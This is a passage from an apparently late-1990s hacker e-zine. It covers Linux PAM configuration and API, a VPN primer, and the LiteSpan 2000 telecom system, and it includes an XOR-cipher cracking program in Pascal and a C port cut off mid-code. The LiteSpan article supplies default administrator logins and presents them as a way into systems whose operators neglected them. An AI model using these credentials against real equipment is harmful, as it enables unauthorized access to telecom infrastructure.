ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 08 of 16 PAM - Pluggable Authentication Modules By Scud-O, Editor in Chief scud@thtj.com Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : PAM ³ ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ I. Introduction II. Modules III. Services IV. Configuration Files V. Shadow Passwords VI. How It Works VI. The PAM API VIII. Sample PAM Application IX. References Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : I. Introduction ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Computers are insecure things. You and I both know that. And, In 1969 so did the fine people at Bell Labs, who coded UNIX. Thus, UNIX needs to be able to authenticate you before it can let you proceed. When you log into any system, you enter a user name and password. These two things are used to see if you are who you say you are. However, these are not the only ways that you can be authenticated, and passwords can be stored in other ways than just the good old /etc/passwd file. Before PAM, if you were to adopt a system of authenication, you would have to recompile every single one of your programs to support the authenication. Hence, may sysadmins did not use alternate methods of authenication, and that is why it is so easy for you and I to get into systems. Enter PAM. PAM stands for 'Pluggable Authenication Modules' , and it is a way of allowing a sysadmin to set up authenication on programs and services on their system with out having to recompile everything. With PAM, you are able to edit a configuration file, and easily control the module. The idea behind PAM was created by both Vipin Samar and Roland J. Schemers, who released their ideas in DCE-RFC-86.0 (rfc86.0.txt, see References on where to get a copy of it) in October 1995. Both Samar and Schemers worked for Sun Microsystems, but to date, the only UNIX version that really supports PAM is Linux, and in particular Red Hat linux, who has used PAM since Red Hat 3.0.4. In Solaris 2.5 PAM was partically implemented, and in Solaris 2.6, it is expected to be fully functional. If you are running a version of Rad Hat after 3.0.4, then you have been using PAM and may not have known about it, since Red Hat's RPM package manager automatically handles the changes to PAM if a package you install requires it. Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : II. Modules ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ There are 4 types of modules defined in the PAM standard. auth: provide the actual authenication (ie. asking for and checking a password, and setting 'credentials' like groups, or creating a kerberos 'ticket') account: check to see if authenication is allowed, the account has not expired or been deleted, the user is allowed to log in, etc. password: used to set passwords session: used once a user has successfully been authenicated to make it possible to actually use there account, and mount their home directory, or mail their mail available, etc. Modules are made to be 'stacked' so that multiple modules can be used. For example, rlogin normally makes use of at least 2 authenication methods: it firsts used rhosts authenication, and if is succeeds, the connection is opened, if not, standard password authenication is done. New modules can be added at any time, and PAM aware applications can be then made to use them. For example, if you use a one-time-password system for something, then you can easily make a module to support it, since documentation for writing modules are included with the system, and PAM aware programs can use the new module and use the one-time-password system without recompiling or modifing in anyway. Here is a list of the modules that people are using/developing for use with Linux-PAM: The point of having modules is that you can just plug them in(!) In other words, they do not need to be compiled with the Linux-PAM library to work. Here are some alternative sources for modules that are being provided independently of the main library: - Thorsten Kukuk has produced a pam_keylogin module for NIS+ support. ftp://weber.uni-paderborn.de/pub/linux/NIS/ - Luigi Catuogno is working on a Transparent Cryptographic Filesystem PAM module - ftp://mikonos.dia.unisa.it/pub/tcfs/v2.0/pam - Tom Ryan's modules: http://camlaw.rutgers.edu/pam/ - Tim Baverstock's modules (and more): http://www.mmm.co.uk/~warwick/pam/ - Kenny MacDonald has been making progress with a pam_nw_auth module. K.MacDonald@ed.ac.uk - David Airlie has produced a module that validates a username/password combination using an NT server, it allows for domain validation. http://www.csn.ul.ie/~airlied/pam_smb/ The following modules are (mostly) to be found in the Linux-PAM source tree: - pam_cracklib: strength checking for new passwords. Requires the cracklib library to compile: libcrack. Intended for stacking before other password modules. Cristian Gafton gafton@sorosis.ro - pam_deny: deny all forms of access Andrew Morgan morgan@parc.power.net - pam_desgold: Enigma Logic DESGold card -- smart card http://www.safeword.com/ Alexander O. Yuriev alex@yuriev.com - pam_filter: module to allow easy access to the stdin/out of a running process. It can be used to log users input etc.. Current pluggable filters include: - upperLOWER: demonstration filter that transposes upper and lower case characters. You are encouraged to write your own.. (Email if you need help.) Andrew Morgan morgan@parc.power.net - pam_ftp: A module that checks if the user is `ftp' or `anonymous'. On finding this to be the case, it prompts for a email address for a password, and proceeds to set the PAM_RUSER item with this value. Andrew Morgan morgan@parc.power.net - pam_group: extension to the /etc/group concept. This module grants group privileges based on who the user is when/where they are requesting a service from and what they are trying to do; Andrew Morgan morgan@parc.power.net - pam_kerberos: Kerberos authentication scheme; Theodore Y. Ts'o tytso@mit.edu An implementation has been written for Kerberos 4 authentication ftp://ftp.dementia.org/pub/pam/ Derrick J Brashear shadow+@andrew.cmu.edu Kerberos 5 authentication too - http://www-personal.engin.umich.edu/~itoi/ Naomaru Itoi itoi@eecs.umich.edu - pam_limits: a module to set the resource limits for a service. Two implementations of this have been merged to produce this module. Cristian Gafton gafton@main.sorosis.ro and Elliot Lee sopwith@redhat.com - pam_listfile: authenticate users based on the contents of a specified file. Elliot Lee sopwith@redhat.com - pam_nologin: This module always lets root in; it lets other users in only if the file /etc/nologin doesn't exist. In any case, if /etc/nologin exists, it's contents are displayed to the user. Michael K. Johnson johnsonm@redhat.com - pam_opie: For Backgroud information, NRL OPIE is a newer one-time password ftp://ftp.funet.fi/pub/unix/security/login/nrl-opie . The official OPIE archive site is ftp://ftp.nrl.navy.mil/pub/security/opie . The contrib subdirectory contains a number of S/Key, OTP, and OPIE compatible one-time password calculators for Mac, PC, etc. Andy Berkheimer andy@tho.org http://www.tjhsst.edu/~aberkhei/ <--- PAM module source is here. - pam_passwd+: password strength checking Al Longyear longyear@netcom.com - pam_permit: always allow access; Andrew Morgan morgan@parc.power.net - pam_pwdb: plug in replacement for pam_unix_* that uses the Password Database library found at: http://parc.power.net/morgan/libpwdb/ Andrew Morgan morgan@parc.power.net - pam_radius: RADIUS authentication, using the Password Database library. Cristian Gafton gafton@sorosis.ro - pam_rhosts: rhost verification as per rlogin etc..; Al Longyear longyear@netcom.com - pam_rootok: module to authenticate the user if their (real) uid is root (intendend for use with the sufficient control flag); Andrew Morgan <morgan@parc.power.net> - pam_securetty: /etc/securetty access controls Elliot Lee sopwith@redhat.com - pam_shells: authenticate users if their shell is listed in the /etc/shells file. Erik Troan ewt@redhat.com - pam_sid: Smart card - SecureID SecureID - http://www.secnet.com Some comments on security problems - ftp://ftp.secnet.com/pub/papers/securid.ps Alexander O. Yuriev alex@bach.cis.temple.edu - pam_skey: S/Key authentication Jeff Uphoff juphoff@tarsier.cv.nrao.edu ftp://linux.nrao.edu/pub/people/juphoff/PAM/ - pam_skey2: is being worked on by Sean Reifschneider - jafo@tummy.com - pam_stress: stress test your application with this module. Andrew Morgan morgan@parc.power.net - pam_tally: this module keeps track of the number of times an attempt is made to access an account. It can deny access after a specified number of failures. Root's account can be treated specially. Tim Baverstock warwick@mmm.co.uk - pam_time: authorize users based on when and where they log in (like securetty, but) in a way that is dependent on the service they are requesting Andrew Morgan morgan@parc.power.net - pam_unix_*: standard unix authentication (with some shadow support); This module is being supported by Red Hat. Michael K. Johnson johnsonm@redhat.com - pam_warn: provides a diagnostic tool for dumping information to syslog(2) about the service-application. Andrew G. Morgan morgan@parc.power.net - pam_wheel: for enforcing the wheel group privileges; Cristian Gafton gafton@sorosis.ro Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : III. Services ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ A quick note about services. Each program that uses PAM defines its own service name. The login program defines the service type login, ftpd defines the service type ftp, and so on. In general, the service type is the name of the program used to _access_ the service, not the program used to _provide_ the service. (The ftpd being defined as ftp is an example.) Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : IV. Configuration Files ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The directory /etc/pam.d is used to configure all PAM applictions. Earlier PAM versions used to use /etc/pam.conf, but that file is now only read if no /etc/pam.d/ entry is found. Each application (service) has its own file. A file might look a little something like this: ( this is tghe file for the basic login 'service' ) #%PAM-1.0 #Module Type Control Flag Module Path Options #----------- ------------ ----------- ------- auth required /lib/security/pam_securetty.so auth required /lib/security/pam_pwdb.so shadow nullok auth required /lib/security/pam_nologin.so account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so password required /lib/security/pam_pwdb.so shadow nullok use_authok session required /lib/security/pam_pwdb.so The first 3 lines, are of course a comment. The next 3 lines stack up 3 modules for use to login authorization. The first line makes sure that if the user is trying to log in as root, the tty they are logging in is listed in /etc/securetty, if the file does exist. The second line causes the user to be asked for a password and to then check the password. The third line then looks to see if the file /etc/nologin exists, and if it does, displays the contents of the file, and then boots off the user if it is not root. Note that all three of these modules are checked, _even if the first module fails_. This was built in as a security precaution. If a user (read: hacker) knew why the authenication failed, then they might be able to figure out how to get around the problem and break the authenication easily. If you want to change this, you can change 'required' to 'requisite', since if a requisite module fails, PAM immediately and does not call the other modules. The line after that (line 7) checks and causes any necessary accouting to be done. (i.e. if shadow passwords have been enabled, the pam_pwdb.so module would check to see if the account has expired, of if the user's password has expired and needs to be changed.) Line 8 then specifies that if the login changes the users password, it should use pam_pwdb.so to do it. This will only occur if the auth module determines that the password needs to be changed, for example, if the shadow password has expired. The last line then goes on to specify that pam_pwdb.so should be used to manage the session. Currently, that module does not do anything, but it could be replaced, or supplemented by stacking a module or two. Note that the order of the lines matters. While it may not matter for the order of the required modules, it matters for the other control flags available for use. sufficent and requisite cause order to be important, as does optional, which is a flag that is rarely used. For an example of this, turn to your rlogin auth configuration, which should look something like: auth required /lib/security/pam_securetty.so auth sufficent /lib/security/pam_rhosts_auth.so auth required /lib/security/pam_pwdb.so shadow nullok auth required /lib/security/pam_nologin.so Now, this file looks almost like the login entry, the extra line and the sufficent make the order of the modules important. First off, pam_securetty.so keeps root from loging in on insecure terminals, which quite effectively prevents rhost root logins. If you wish to allow them you can simply remove that line. Second, if pam_rhosts_auth.so authenticates the user, then PAM skips the password checking, otherwise if it fails, then the failed authentication is ignored. If pam_rhosts_auth.so fails to authenicate the user, then pam_pwdb.so is used to do normal password authentication. Finally, pam_nologin.so checks /etc/nologin. Note that if you do not want to prompt for a password if the securetty checks fail, then you can modify pam_securetty.so from required to requisite. Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : V. Shadow Passwords ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ A quick note for Red Hat users, if you wish to use PAM and shadow passwords, you are in luck. pam_pwdb.so can support shadow passwords. To convert your system for shadow passwords, use the following commands: cd /etc pwconv5 chmod 600 passwd- shadow- pam_pwdb.so will automatically detect that you have implemented shadow passwords, and it will make all the adjustments necessary. Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : VI. How It Works ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The core components of the PAM framework are the authentication library API front end and the authentication mechanism-specific modules back end, connected through the Service Provider Interface. Applications write to the PAM API, while the authentication-system providers write to the PAM SPI and supply the back end modules that are independent of the application. ftp telnet login <-- Applications ³ ³ ³ ³ ³ ³ ÀÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÙ ³ ÚÄÄÄÄÄÁÄÄÄÄÄ¿ ³ PAM API ³ <-- pam.conf | /etc/pam.d/ ÀÄÄÄÄÄÂÄÄÄÄÄÙ ³ ÚÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄ¿ UNIX Kerberos Smart Cards <-- Mechanisms Basic PAM Architecture The figure above illustrates the relationship between the application, the PAM library, and the authentication modules. Three application (login, telnet and ftp) are shown which use the PAM authentication interfaces. When an application makes a call to the PAM API, it loads the appropriate authentication module as determined by the configuration file, /etc/pam.d/, unless this is not found, then pam.conf is used. The request is forwarded to the underlying authentication module (for example, UNIX password, Kerberos, etc.) to perform the specified operation. The PAM layer then returns the response from the authentication module to the application. PAM unifies system authentication and access control for the system, and allows plugging of associated authentication modules through well defined interfaces. The plugging can be defined through various means, one of which uses a configuration file, as shown in Section IV. Each of the system applications, the file specifies the authentication module that should be loaded. Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : VII. The PAM API ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The following should give you an basic description of the various interfaces of PAM. Since the goal here is just for you to get a working knowledge about the PAM interfaces, not all flags and options have been fully defined and explained. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Framework Layer APIs ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ int pam_start( char *service_name, char *user, struct pam_conv *pam_conversation, pam_handle_t **pamh ); pam_start() is called to initiate an authentication transaction. pam_start() takes as arguments the name of the service, the name of the user to be authenticated, the address of the conversation structure. pamh is later used as a handle for subsequent calls to the PAM library. The PAM modules do not communicate directly with the user; instead they rely on the application to perform all such interaction. The application needs to provide the conversation functions, conv(), and associated application data pointers through a pam_conv structure when it initiates an authentication transaction. The module uses the conv() function to prompt the user for data, display error messages, or text information. int pam_end( pam_handle_t *pamh, int pam_status ); pam_end() is called to terminate the PAM transaction as specified by pamh, and to free any storage area allocated by the PAM modules with pam_set_item(). int pam_set_item( pam_handle_t *pamh, int item_type, void *item ); int pam_get_item( pam_handle_t *pamh, int item_type, void **item); pam_get_item() and pam_set_item() allow the parameters specified in the initial call to pam_start() to be read and updated. This is useful when a particular parameter is not available when pam_start() is called or must be modified after the initial call to pam_start(). pam_set_item() is passed a pointer to the object, item, and its type, item_type. pam_get_item() is passed the address of the pointer, item, which is assigned the address of the requested object. The item_type will be one of the following: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Item Name ³ Description ³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³ PAM_SERVICE ³ The service name ³ ³ PAM_USER ³ The user name ³ ³ PAM_TTY ³ The tty name ³ ³ PAM_RHOST ³ The remote host name ³ ³ PAM_CONV ³ The pam_conv structure ³ ³ PAM_AUTHTOK ³ The authentication token (password)³ ³ PAM_OLDAUTHTOK ³ The old authentication token ³ ³ PAM_RUSER ³ The remote user name ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Note: that the values of PAM_AUTHTOK and PAM_OLDAUTHTOK are only available to PAM modules and not to the applications. They are explicitly cleared out by the framework before returning to the application. char * pam_strerror( int errnum ); pam_strerror() maps the error number to a PAM error message string, and returns a pointer to that string. int pam_set_data( pam_handle_t *pamh, char *module_data_name, char *data, (*cleanup)(pam_handle_t *pamh, char *data, int error_status) ); The pam_set_data() function stores module specific data within the PAM handle. The module_data_name uniquely specifies the name to which some data and cleanup callback function can be attached. The cleanup function is called when pam_end() is invoked. int pam_get_data( pam_handle_t *pamh, char *module_data_name, void **datap ); The pam_get_data() function obtains module-specific data from the PAM handle stored previously by the pam_get_data() function. The module_data_name uniquely specifies the name for which data has to be obtained. This function is normally used to retrieve module specific state information. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Authentication APIs ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ int pam_authenticate( pam_handle_t *pamh, int flags ); The pam_authenticate() function is called to verify the identity of the current user. The user is usually required to enter a password or similar authentication token, depending upon the authentication module configured with the system. The user in question is specified by a prior call to pam_start(), and is referenced by the authentication handle, pamh. int pam_setcred( pam_handle_t *pamh, int flags ); The pam_setcred() function is called to set the credentials of the current process associated with the authentication handle, pamh. The actions that can be denoted through flags include credential initialization, refresh, reinitialization and deletion. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Password Management APIs ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ int pam_chauthtok( pam_handle_t *pamh, int flags ); pam_chauthtok() is called to change the authentication token associated with the user referenced by the authentication handle pamh. After the call, the authentication token of the user will be changed in accordance with the authentication module configured on the system. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Session Management APIs ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ int pam_open_session( pam_handle_t *pamh, int flags ); pam_open_session() is called to inform the session modules that a new session has been initialized. All programs which use PAM should invoke pam_open_session() when beginning a new session. int pam_close_session( pam_handle_t *pamh, int flags ); Upon termination of this session, the pam_close_session() function should be invoked to inform the underlying modules that the session has terminated. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Account Management API ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ int pam_acct_mgmt( pam_handle_t *pamh, int flags ); The function pam_acct_mgmt() is called to determine whether the current user's account and password are valid. This typically includes checking for password and account expiration, valid login times, etc. The user in question is specified by a prior call to pam_start() and is referenced by the authentication handle, pamh. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ The PAM Service Provider Interface: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This is very similar to the PAM API, except for one extra parameter to pass module-specific options to theunderlying modules. Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : VIII. Sample PAM Application ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Below is a sample login application which uses the PAM APIs. It is not meant to be a fully functional login program, alot of functionality has been left out in order to show and emphasize the use of PAM APIs. #include static int login_conv(int num_msg, struct pam_message **msg, struct pam_response **response, void *appdata_ptr); static struct pam_conv pam_conv = {login_conv, NULL}; static pam_handle_t *pamh; /* Authentication handle */ void main(int argc, char *argv[], char **renvp) { /* * Call pam_start to initiate a PAM authentication operation */ if ((pam_start("login", user_name, &pam_conv, &pamh)) != PAM_SUCCESS) login_exit(1); pam_set_item(pamh, PAM_TTY, ttyn); pam_set_item(pamh, PAM_RHOST, remote_host); while (!authenticated && retry < MAX_RETRIES) { status = pam_authenticate(pamh, 0); authenticated = (status == PAM_SUCCESS); } if (status != PAM_SUCCESS) { fprintf(stderr,"error: %s\n", pam_strerror(status)); login_exit(1); } /* now check if the authenticated user is allowed to login. */ if ((status = pam_acct_mgmt(pamh, 0)) != PAM_SUCCESS) { if (status == PAM_AUTHTOK_EXPIRED) { status = pam_chauthtok(pamh, 0); if (status != PAM_SUCCESS) login_exit(1); } else { login_exit(1); } } /* * call pam_open_session to open the authenticated session * pam_close_session gets called by the process that * cleans up the utmp entry (i.e., init) */ if (status = pam_open_session(pamh, 0) != PAM_SUCCESS) { login_exit(status); } /* set up the process credentials */ setgid(pwd->pw_gid); /* * Initialize the supplementary group access list. * This should be done before pam_setcred because * the PAM modules might add groups during the pam_setcred call */ initgroups(user_name, pwd->pw_gid); status = pam_setcred(pamh, PAM_ESTABLISH_CRED); if (status != PAM_SUCCESS) { login_exit(status); } /* set the real (and effective) UID */ setuid(pwd->pw_uid); pam_end(pamh, PAM_SUCCESS); /* Done using PAM */ /* * Add DCE/Kerberos cred name, if any. * XXX - The module specific stuff should be removed from login * program eventually. This is better placed in DCE module and * will be once PAM has routines for "exporting" environment * variables. */ krb5p = getenv("KRB5CCNAME"); if (krb5p != NULL) { ENVSTRNCAT(krb5ccname, krb5p); envinit[basicenv++] = krb5ccname; } environ = envinit; /* Switch to the new environment. */ exec_the_shell(); /* All done */ } /* * login_exit - Call exit() and terminate. * This function is here for PAM so cleanup can * be done before the process exits. */ static void login_exit(int exit_code) { if (pamh) pam_end(pamh, PAM_ABORT); exit(exit_code); /*NOTREACHED*/ } /* * login_conv(): * This is the conv (conversation) function called from * a PAM authentication module to print error messages * or garner information from the user. */ static int login_conv(int num_msg, struct pam_message **msg, struct pam_response **response, void *appdata_ptr) { while (num_msg--) { switch (m->msg_style) { case PAM_PROMPT_ECHO_OFF: r->resp = strdup(getpass(m->msg)); break; case PAM_PROMPT_ECHO_ON: (void) fputs(m->msg, stdout); r->resp = malloc(PAM_MAX_RESP_SIZE); fgets(r->resp, PAM_MAX_RESP_SIZE, stdin); /* add code here to remove \n from fputs */ break; case PAM_ERROR_MSG: (void) fputs(m->msg, stderr); break; case PAM_TEXT_INFO: (void) fputs(m->msg, stdout); break; default: /* add code here to log error message, etc */ break; } } return (PAM_SUCCESS); } Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : IX. References ³ ú-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ DCE-RFC-86.0 (rfc86.0.txt) - http://www.redhat.com/linux-info/PAM/rfc86.0.txt ( among a million other places ) Red Hat PAM info - http://www.redhat.com/linux-info/PAM/ Linux-PAM Effort - http://www.parc.power.net/morgan/Linux-PAM/index.html System Administrator's Guide Module Writer's Guide Application Developer's Manual ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 09 of 16 VPN's Demystified by Meikon, Special to thtj VPN's short for Virtual Private Networks are secure networks that implement encryption to communicate between two users. It allows private communication over virtual WANs or LANs. The VPN can also be implemented in X.25 networks. VPN's also provide secure data transmission with Tunneling Protocol through the Internet. With standard networks, a sniffer can easily overcome security. In a VPN , there are thre eimplementations used. 1. Encryption - use of algorithm to encrypt and decrypt data transfer. 2. Authentication - confirmation of users identity on the network (use public key authentication to confirm users connection) also sometimes use of login and password , which is vunerable to crackers. 3. Data Integrity - hash used , differnet hashes used : Message Digest (MD5) , Secure Hash Algorithm1 (SHA-1). The MD5 Hash generates 128-bit keys. The SHA-1 Hash generates 160-bit keys. - VPN's Sources on the Internet - http://www.TeleCommerce.com/ - TeleCommerce, Inc http://www.francetelecom.fr/ - France Telecom http://www.rad.net.id/homes/edward/intranet/intra7 - Information on VPN's ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 10 of 16 LiteSpan 2000 by XiLiCoN, Special to thtj A Litespan 2000 unit is a Synchronous Optical Network (SONET) based Optical Loop Carrier (OLC) system. It provides 4 system functions. Those systems are as follows: DLC) Digital Loop Carrier: Provides 2,016 DS0s of bandwidth for delivery of services such as data, coin, or dial tone. DCS) Digital Cross Connect System: Takes apart DS1 signals into DS0, rearranges them and puts them back into DS1 signals. This is know as 1-0-1 cross-connect. SONET) Fiber transport system: Uses lightwave technology and SONET protocol to transport signals between lightspan terminals. MUX) Mulitplexer: Takes multiple low speed signals(DS0s, DS1s) and interleaves them to form a single high speed data stream at SONET bit rates. _,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,__,.-System Security-.,_,.-~-.,_,.-~-.,,.-~-.,_,.-~-.,_,.-~-.,_,.-~-.,_ The Litespan provides two levels of security to maintain system integrity. These security levels controls who can access the system and what the authorized user is allowed to do in the system. - Each authorized user is assigned a set of privileges that determine the actions allowed to the user. - The Litespan maintains an internal list of authorized user IDs, passwords, and user privileges. - There are up to 20 users possible. Now to access security.you will be prompted for a User Id and a Password at a terminal that looks much like this: OMAPS Log In OMAPS V05.01.05 Copyright 1997 Optlink Corp. All Rights Reserved User Id: Password: Now for the ball busting part. If you repeat the login procedure incorrectly 5 times you will be locked out of the system. Also the user id's can be up to 20 character, number or letter with both upper and lower case. Same with the password. The litespan has a sysadmin like in a unix system, but the litespan admin usually has a long beard and a smug expression. But it is possible that a dumb sysadmin will leave in the default logins/passwords. Those are as follows: User Id: optlink Password: optlink and.. User Id: sysadmin Password: sysadmin Well that gives you a look at System Security from the outside, Look at part 3 if you were able to get in. It gives a run down on User Privileges. User Privleges. Well user privileges are important, the sysadmin maintains a file in the system that gives different users different privileges. The user privileges file will be setup somewhat like this: User Id Password CP M M0 M1 N NR P PR P0 P1 S T User1 ***** x x x x x x User2 ***** x x x x x x That is a basic layout. The CP, M, M0 ect. are privileges. The X's are basically checks allowing a certain user to perform a certain act in the system. The Different Privileges are as follows: CP = Allows someone to change the user id, password or privileges of any user on the system. This is one of the sysadmins privileges for the most part. M0 = Maintenance privlege (DS0 only) M1 = Maintenance privlege (DS1 only) MR = Maintenace READ ONLY privlege N = Network Administrative privlege; Allows backup and restore of database NR = Network Administrative READ ONLY privlege; Allows access to network information P = Provisioning privlege; Necessary to make changes from the provisioning menu P0 = Provisioning privlege (DS0 only) P1 = Provisioning privlege (DS1 only) PR = Provisioning READ ONLY privilege S = System Administrative privlege; Necessary to make changes from the administrative menu T = Testing privlege; Allows execution of testing commands Well thats it! Triviality is only skin deep-XiLiCoN ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ The Code: o genericrack2.pas - The Messiah : Pascal code to crack encryption from an issue of CRH o genericrack2.c - Shok : C Ported code of genericrack2.pas o word.c - memor : Word List Processor o rm.c Fix - Shok : fixed holes in rm.c from thtj15 ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 11 of 16 genericrack2.pas By The Messiah, Staff Writer program genericrack2; uses SysUtils; const MAXKEY = 1024; var key, buffer : array[1..MAXKEY] of Byte; count, maxcount : array[1..MAXKEY] of Integer; inpath, outpath : String; minkeysize, maxkeysize, i : Integer; procedure Crack(Filename : String; keysize : Integer); var file1: file; i,j, result: integer; b : byte; begin Write('Cracking'); Assignfile(file1,Filename); Reset(file1,1); for i := 1 to KeySize do begin key[i] := 0; maxcount[i] := 0; end; for i:=0 to 255 do begin seek(file1,0); for j := 1 to KeySize do count[j] := 0; while not eof(file1) do begin blockread(file1,buffer,keysize,result); for j:=1 to result do begin b:= i xor buffer[j]; if b in [10,13,32,97..122] then count[j] := count[j] + 1; end; end; for j:=1 to keysize do if count[j]>maxcount[j] then begin key[j]:=i; maxcount[j]:=count[j]; end; Write('.'); end; WriteLn('Done!'); closefile(file1); end; procedure Decrypt(infile, outfile : String; keysize : Integer); var file1,file2: file; i,j, result: integer; begin Write('Decrypting'); assignfile(file1,infile); reset(file1,1); assignfile(file2,outfile); rewrite(file2,1); while not eof(file1) do begin blockread(file1,buffer,keysize,result); for j:=1 to result do buffer[j]:= buffer[j] xor key[j]; blockwrite(file2,buffer,result,i); Write('.'); end; closefile(file1); closefile(file2); WriteLn('Done!'); end; begin Write('Min key size: '); ReadLn(minkeysize); Write('Max key size: '); ReadLn(maxkeysize); Write('Enter ciphertext: '); ReadLn(inpath); for i := minkeysize to maxkeysize do begin outpath := ExtractFilePath(inpath) + IntToStr(i) + '.txt'; Crack(inpath, i); WriteLn; Decrypt(inpath, outpath, i); WriteLn; end; end. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ 12 of 16 genericrack2.c By Shok, Staff Writer /* genericrack2 by The Messiah converted to C by Shok */ #include #include #include #define MAXKEY 1024 char key[MAXKEY], buffer[MAXKEY]; int count[MAXKEY], maxcount [MAXKEY]; char *inpath, *outpath; int minkeysize, maxkeysize, i; void Crack(char *Filename, int keysize) { FILE *file1; int i, j, result = 0; char b; char ifeof; printf("Cracking"); sleep(1); file1=fopen(Filename, "r"); for (i=1; i <= keysize + 1; i++) { key[i] = 0; maxcount[i] = 0; } for (i=0; i < 256; i++) { for (j=1; j < keysize + 1; j++) count[j] = 0; while (ifeof != EOF) { /* Get the size in bytes */ ifeof = getc(file1); result += 1; if (result >= sizeof(buffer)) break; } rewind(file1); while 